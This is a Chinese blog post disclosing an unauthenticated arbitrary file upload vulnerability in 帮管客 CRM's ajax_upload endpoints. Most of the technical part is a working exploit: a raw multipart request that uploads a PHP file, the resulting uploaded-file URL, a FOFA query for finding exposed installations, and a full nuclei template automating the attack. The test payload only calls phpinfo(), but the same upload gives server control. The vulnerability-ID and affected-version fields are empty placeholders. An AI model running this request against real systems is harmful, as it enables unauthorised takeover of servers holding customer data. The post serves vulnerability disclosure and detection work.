帮管客CRM任意文件上传漏洞

最新推荐文章于 2024-09-05 10:26:28 发布
最新推荐文章于 2024-09-05 10:26:28 发布
阅读量326 收藏 4
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136024924
版权
这篇文章报道了帮管客CRM系统中的文件上传漏洞,攻击者可通过特定接口获取服务器权限。漏洞编号CVECNVDCNNVD,影响范围包括指定版本。提供POC示例和修复建议,建议用户及时更新到最新版本以保护系统安全。
摘要由CSDN通过智能技术生成

帮管客CRM任意文件上传漏洞

1.漏洞介绍

帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞,未经授权的攻击者可利用该漏洞获取服务器权限

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:app=“帮管客-CRM”
在这里插入图片描述

5.POC
POST /index.php/upload/ajax_upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o

------WebKitFormBoundaryv1WbOn5o
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php
phpinfo();unlink(__FILE__);
------WebKitFormBoundaryv1WbOn5o--

在这里插入图片描述
http://127.0.0.1/data/uploads/202402/202402041400820knEMOadj.php
在这里插入图片描述

nuclei检测

id: CRM-uploadfile

info:
  name: 帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞 未经授权的攻击者可利用该漏洞获取服务器权限 
  author: test
  severity: high
  metadata: 
    fofa: app="帮管客-CRM"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /index.php/upload/ajax_upload HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o

        ------WebKitFormBoundaryv1WbOn5o
        Content-Disposition: form-data; name="file"; filename="1.php"
        Content-Type: image/jpeg

        <?php
        phpinfo();unlink(__FILE__);
        ------WebKitFormBoundaryv1WbOn5o--

      - |
        GET data/uploads/{{path}}/{{path1}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    extractors:
          - type: regex
            name: path
            group: 1
            regex:
              - 'uploads\\/(\w*)\\'
            internal: true

          - type: regex
            name: path1
            group: 1
            regex:
              - '\\/(\w*)\.php"'
            internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"PHP")

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
灵当CRM multipleUpload.php接口处存在文件上传漏洞
nnn2188185的博客
09-24 68
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案。
帮管客 CRM 文件上传漏洞复现
0xSec
11-26 1107
帮管客CRM ajax_upload_chat、ajax_upload接口处存在文件上传漏洞,未经授权的攻击者可利用该漏洞获取服务器权限。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 911
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
灵当crm multipleupload 任意文件上传
最新发布
weixin_43167326的博客
09-05 1122
灵当CRM客户管理系统,采用php语言开发,其multipleUpload.php存在任意文件上传漏洞
c#mvc上传文件保存到后台_【安全漏洞通告】CRMEB知识付费系统后台存在文件上传漏洞...
weixin_39844880的博客
12-25 509
安全漏洞通告INFORMATIONCRMEB知识付费系统后台存在文件上传漏洞01漏洞背景西安众邦网络科技有限公司以网站建设、微信公众号、微信商城以及O2O商城为核心业务,专注于创意设计和传播应用。CRMEB知识付费系统由西安众邦科技基于ThinkPhp5.0+vue+layui开发,具有自主知识产权。该系统后台用form-builder PHP快速生成现代化表单应用、ECharts实现完...
64717帮管客CRM免费版v3.6.0.rar
08-08
64717帮管客CRM免费版v3.6.0环境要求:PHP7.0+Mysql5.5及以上版本,推荐使用phpstudy、宝塔等集成环境(不支持Windows+Nginx的环境,如果服务器是Windows,建议安装Apache,不要安装Nginx) 面向中小企业的免费版本,易于安装维护,安全便捷,支持虚拟主机空间。 郑重承诺:本系统无任何后门及其他流氓手段。程序代码加密,不影响正常使用。 系统简介: 帮管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。帮管客CRM是适用于中小企业的通用型客户关系管理系统,融合了帮管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上注重实用、易用、安全、稳定。在性能方面也表现优异,使用普通PC服务器即可实现百人级别的并发应用。 帮管客CRM客户管理系统 采用基于WEB的企业计算,采用php+MySQL进行开发,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。采用加密数据传递参数,保护系统数据安全。多级的权限控制,完善的密码验证与登录机制更加强了系统安全性。 帮管客CRM客户管理系统软件特点: 1.不同账号分配不同权限; 2.所有字段支持自定义设置; 3.客户可转移、共享、移入公海; 4.录入客户相关资料,可随时跟踪客户; 5.快速查看客户的关联信息; 6.客户删除进入回收站,可恢复; 初始管理员用户名和密码为安装时设定的! 如需重新安装系统,请删除install目录下的install.lock文件,重新安装会清空所有数据。
帮管客CRM客户管理系统v2.0.3(去限制版),客户管理系统选帮管客,PHP源码.zip
09-30
帮管客CRM客户管理系统v2.0.3(去限制版),客户管理系统选帮管客,PHP源码.zip
帮管客 CRM客户管理系统 v4.0.1.zip
06-08
帮管客CRM客户管理系统软件特点: 1.不同账号分配不同权限; 2.所有字段支持自定义设置; 3.客户可转移、共享、移入公海; 4.录入客户相关资料,可随时跟踪客户; 5.快速查看客户的关联信息; 6.客户删除进入回收站...
帮管客CRM免费版V4.2.2
09-16
帮管客CRM免费版
帮管客CRM客户管理系统 v1.2.2.zip
02-15
帮管客CRM客户管理系统 v1.2.2 新版erp系统,100%真实可用、 独立系统建站,搭建自己独立erp系统吧
帮管客CRM客户管理系统 v1.0.8
10-21
面向中小企业的免费版本,易于安装维护,安全便捷,支持虚拟主机空间。郑重承诺:本系统无任何后门及其他流氓手段。程序代码加密,不影响正常使用。系统简介:帮管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。帮管客CRM是适用于中小企业的通用型客户关系管理系统,融合了帮管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上注重实用、易用、安全、稳定。在性能方面也表现优异,使用普通PC服务器即可实现百人级别的并发应用。 帮管客CRM客户管理系统 采用基于WEB的企业计算,采用php+MySQL进行开发,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。采用加密数据传递参数,保护系统数据安全。多级的权限控制,完善的密码验证与登录机制更加强了系统安全性。帮管客CRM客户管理系统软件特点: 1.不同账号分配不同权限;2.所有字段支持自定义设置;3.客户可转移、共享、移入
帮管客CRM客户管理系统 v2.4.5
11-24
为您提供帮管客CRM客户管理系统下载,帮管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。帮管客CRM是适用于中小企业的通用型客户关系管理系统,融合了帮管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上
帮管客CRM客户管理系统官方版 v1.2.2
08-22
面向中小企业的版本,易于安装维护,安全便捷,支持虚拟主机空间。 郑重承诺:本系统无任何后门及其他流氓手段。程序代码加密,不影响正常使用。 系统简介: 帮管客CRM客户
帮管客PHP_帮管客CRM客户管理系统v2.0.3(去限制版) (Help customers to go to the website and account restrictions) - 下载 ...
weixin_34996054的博客
03-09 754
文件名大小更新时间帮管客CRM客户管理系统v2.0.302020-08-15帮管客CRM客户管理系统v2.0.3\app02020-08-12帮管客CRM客户管理系统v2.0.3\app\cache02020-08-12帮管客CRM客户管理系统v2.0.3\app\cache\index.html1312020-04-26帮管客CRM客户管理系统v2.0.3\app\config02020-08-...
帮管客CRM客户管理系统 v3.6.0
字节网盘SEO工具
08-06 405
介绍: 帮管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。帮管客CRM是适用于中小企业的通用型客户关系管理系统,融合了帮管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上注重实用、易用、安全、稳定。在性能方面也表现优异,使用普通PC服务器即可实现百人级别的并发应用。 帮管客
帮管客CRM客户管理系统 v2.1.8
博客模板下载
01-30 312
介绍 帮管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。帮管客CRM是适用于中小企业的通用型客户关系管理系统,融合了帮管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上注重实用、易用、安全、稳定。在性能方面也表现优异,使用普通PC服务器即可实现百人级别的并发应用。 帮管客C
帮管客CRM客户管理系统V2.5.4OA系统PHP源码,已去除域名授权无限制版
2301_76817904的博客
03-15 645
源码介绍帮管客CRM客户管理系统基于先进的CRM营销理念设计,集客户档案、销售记录、业务往来于一身,以凝聚客户关系、提升资源价值为核心,将潜在客户变为现实客户、从而提升销售量、提高用户的满意度,并增加企业竞争力。帮管客CRM是适用于中小企业的通用型客户关系管理系统,融合了帮管客软件长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。在功能上注重实用、易用、安全、稳定。在性能方面也表现优异,使用普通PC服务器即可实现百人级别的并发应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值